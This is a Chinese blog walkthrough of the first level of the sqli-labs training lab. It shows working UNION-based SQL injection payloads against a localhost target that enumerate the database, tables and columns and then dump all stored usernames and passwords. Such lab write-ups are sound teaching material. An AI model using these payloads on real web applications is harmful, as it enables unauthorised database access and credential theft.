sqlilabs闯关指北(随缘做随缘更)
2021/7/22 19:15:21
本文主要是介绍sqlilabs闯关指北(随缘做随缘更),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
web毕竟不是主业,龟速更新,萌新一头如有错误还望大佬们指出
Less-1
尝试 ?id=1 回显正常
接着尝试在 id 后面加上',发现页面回显不正常,表示可能存在字符注入
输入 --+ 将 sql 后面的语句注释掉后,发现页面回显正常,则证明这个地方是单引号字符型注入
接着使用 order by 判断该表中一共有几列数据。order by 3 页面回显正常,4 页面回显不正常,说明此表一共有 3 列
将 id=1 改为一个数据库不存在的 id 值,如 466,使用 union select 1,2,3 联合查询语句查看页面是否有显示位
发现页面先输出了 2 和 3,说明页面有 2 个显示位
然后利用 sql 查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
查询当前使用的数据库和基本信息 http://localhost/sqli-labs-master/Less-1/?id=466' union select 1,2,concat_ws(char(32,58,32),user(),database(),version()) --+ 其中 concat_ws() 的第一个参数是连接字符串的分隔符,user()返回当前数据库连接使用的用户,database()返回当前数据库连接使用的数据库,version()返回当前数据库的版
在继续爆破前先明确以下知识点:
- information_schema.tables: 包含了数据库里所有的表
- table_name: 表名
- table_schema: 数据库名
- column_name: 字段名
查询数据库security的表 http://localhost/sqli-labs-master/Less-1/?id=466' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
接着看users表的字段名 http://localhost/sqli-labs-master/Less-1/id=466' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+
看到了 username 和 password 字段
然后去查询字段信息 http://localhost/sqli-labs-master/Less-1/id=466' union select 1,2,group_concat(0x5c,username,0x3a,password) from users--+
获得了所有的账号和密码,本题到此结束
这篇关于sqlilabs闯关指北(随缘做随缘更)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-10百万架构师第十三课:源码分析:Spring 源码分析:Spring核心IOC容器及依赖注入原理|JavaGuide
- 2025-01-10便捷好用的电商API工具合集
- 2025-01-09必试!帮 J 人团队解决物流错发漏发的软件神器!
- 2025-01-09不容小觑!助力 J 人物流客服安抚情绪的软件!
- 2025-01-09为什么医疗团队协作离不开智能文档工具?
- 2025-01-09惊叹:J 人团队用啥软件让物流服务快又准?
- 2025-01-09如何利用数据分析工具优化项目资源分配?4种工具推荐
- 2025-01-09多学科协作难?这款文档工具可以帮你省心省力
- 2025-01-09团队中的技术项目经理TPM:工作内容与资源优化策略
- 2025-01-09JIT生产管理法:优化流程,提升竞争力的秘诀